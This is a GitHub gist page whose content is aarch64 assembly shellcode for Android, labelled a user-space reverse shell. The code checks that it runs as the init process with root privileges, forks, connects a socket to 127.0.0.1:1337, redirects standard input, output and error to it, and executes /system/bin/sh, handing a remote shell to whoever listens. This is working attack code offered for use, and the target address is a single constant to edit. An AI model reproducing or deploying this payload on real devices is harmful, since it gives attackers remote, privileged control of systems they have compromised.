Created
August 1, 2024 08:50
-
-
Save soez/bbbd136c3c138fcecc2add30d49adac1 to your computer and use it in GitHub Desktop.
user space aarch64 shellcode reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .section .text | |
| .global _start | |
| _start: | |
| // prologo | |
| sub sp, sp, #0xc0 | |
| stp x29, x30, [sp, #0x60] | |
| stp x28, x27, [sp, #0x70] | |
| stp x26, x25, [sp, #0x80] | |
| stp x24, x23, [sp, #0x90] | |
| stp x22, x21, [sp, #0xa0] | |
| stp x20, x19, [sp, #0xb0] | |
| // sys_getpid | |
| mov x8, #0xac // syscall number getpid | |
| svc #0 | |
| cmp x0, #0x1 // init process, comment this syscall if you disabled selinux | |
| bne exit | |
| // sys_getuid | |
| mov x8, #0xae // syscall number getuid | |
| svc #0 | |
| cmp x0, #0x0 | |
| bne exit | |
| // sys_fork | |
| movk x0, #0x120, lsl #16 | |
| mov x1, #0 | |
| mov x2, #0 | |
| mov x3, #0 | |
| mov x8, #0xdc // syscall number fork | |
| svc #0 | |
| cmp x0, #0x0 | |
| bne exit | |
| // sys_socket(2, 1, 0) | |
| mov x0, #2 | |
| mov x1, #1 | |
| mov x2, #0 | |
| mov x8, #0xc6 // syscall number socket | |
| svc #0 | |
| mov x19, x0 | |
| // sys_connect(s, [2, 1337, <IP>], 16) | |
| mov x0, x19 | |
| adr x1, ippuerto | |
| mov x2, #0x10 | |
| mov x8, #0xcb // syscall number connect | |
| svc #0 | |
| // sys_dup3(s, 0, 0) | |
| mov x0, x19 | |
| mov x1, #0 | |
| mov x2, xzr | |
| mov x8, #0x18 // syscall number dup3 | |
| svc #0 | |
| // sys_dup3(s, 1, 0) | |
| mov x0, x19 | |
| mov x1, #1 | |
| mov x2, xzr | |
| mov x8, #0x18 // syscall number dup3 | |
| svc #0 | |
| // sys_dup3(s, 2, 0) | |
| mov x0, x19 | |
| mov x1, #2 | |
| mov x2, xzr | |
| mov x8, #0x18 // syscall number dup3 | |
| svc #0 | |
| // sys_execve | |
| adr x0, shell | |
| mov x21, x0 | |
| mov x22, #0 | |
| str x21, [sp] | |
| str x22, [sp, #0x8] | |
| mov x1, sp | |
| mov x2, #0 | |
| mov x8, #0xdd // syscall number execve | |
| svc #0 | |
| // sys_exit(0) | |
| mov x0, #0 | |
| mov x1, #0 | |
| mov x8, #0x5e // syscall number exit | |
| svc #0 | |
| exit: | |
| // epilogo | |
| ldp x20, x19, [sp, #0xb0] | |
| ldp x22, x21, [sp, #0xa0] | |
| ldp x24, x23, [sp, #0x90] | |
| ldp x26, x25, [sp, #0x80] | |
| ldp x28, x27, [sp, #0x70] | |
| ldp x29, x30, [sp, #0x60] | |
| add sp, sp, #0xc0 | |
| ret | |
| ippuerto: | |
| .quad 0x0100007f39050002 // 127.0.0.1:1337 | |
| shell: | |
| .ascii "/system/bin/sh\0" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment